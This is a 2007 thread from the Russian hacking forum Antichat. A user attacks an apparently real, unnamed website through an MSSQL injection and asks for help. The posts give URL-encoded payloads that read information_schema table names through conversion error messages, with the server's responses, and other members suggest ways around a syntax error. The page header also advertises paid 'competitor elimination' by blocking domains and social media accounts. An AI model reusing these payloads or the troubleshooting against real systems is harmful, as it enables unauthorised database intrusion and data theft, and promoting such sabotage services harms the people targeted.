Форум АНТИЧАТ - [Microsoft][ODBC SQL Server Driver]

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
[Microsoft][ODBC SQL Server Driver]

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

[Microsoft][ODBC SQL Server Driver]

14.01.2007, 20:34

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

[Microsoft][ODBC SQL Server Driver]

Хай.
Короче есть проблема которую нужно решить

Существует сайт.
На сайте инъекция (MSSQL)
При запросе такого вида:
===============================
-1+select+top+1+table_name+from+information_schema. tables
===============================

В ошибке выводится имя таблицы:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Products' to a column of data type int
===============================

Одна таблица есть, пробую вытащить имя второй таблицы таким запросом:
===============================
select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in('Products')
===============================

На что сервак мне отвечает:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax near 'Products'
===============================

На многих серваках этот приём срабатывал.....
Ошибка синтаксиса, хмм..
В чем же она заключается???

14.01.2007, 20:59

max_pain89

Постоянный

Регистрация: 11.12.2004

Сообщений: 592

Провел на форуме:
2260903

Репутация: 345

после in пробел есть?

14.01.2007, 21:07

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

угу

14.01.2007, 21:51

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

мб забыл -- поставить?

__________________

14.01.2007, 22:09

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

нет, комент там и не нужен все ок
Может есть какиенить альтернативы по перебору колонок?

14.01.2007, 22:22

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

попробуй скобки убрать, т.е. просто table_name+not+in+'Products'

14.01.2007, 22:34

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

Спасибо попробую

14.01.2007, 22:54

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

Попробовал, вот что мне вылезло:
============================
Incorrect syntax near ''
============================

14.01.2007, 23:05

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

Решение - кинь ссылку, вторую теу уже создаешь )

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#10

14.01.2007, 23:24

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

хм интересено, если 'Products' перевести в вид "char(....)"
типа :

================================
select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in(char(....))
================================

Последний раз редактировалось sh-smoker; 14.01.2007 в 23:27..

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL	k00p3r	Чужие Статьи	0	12.06.2005 12:42
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход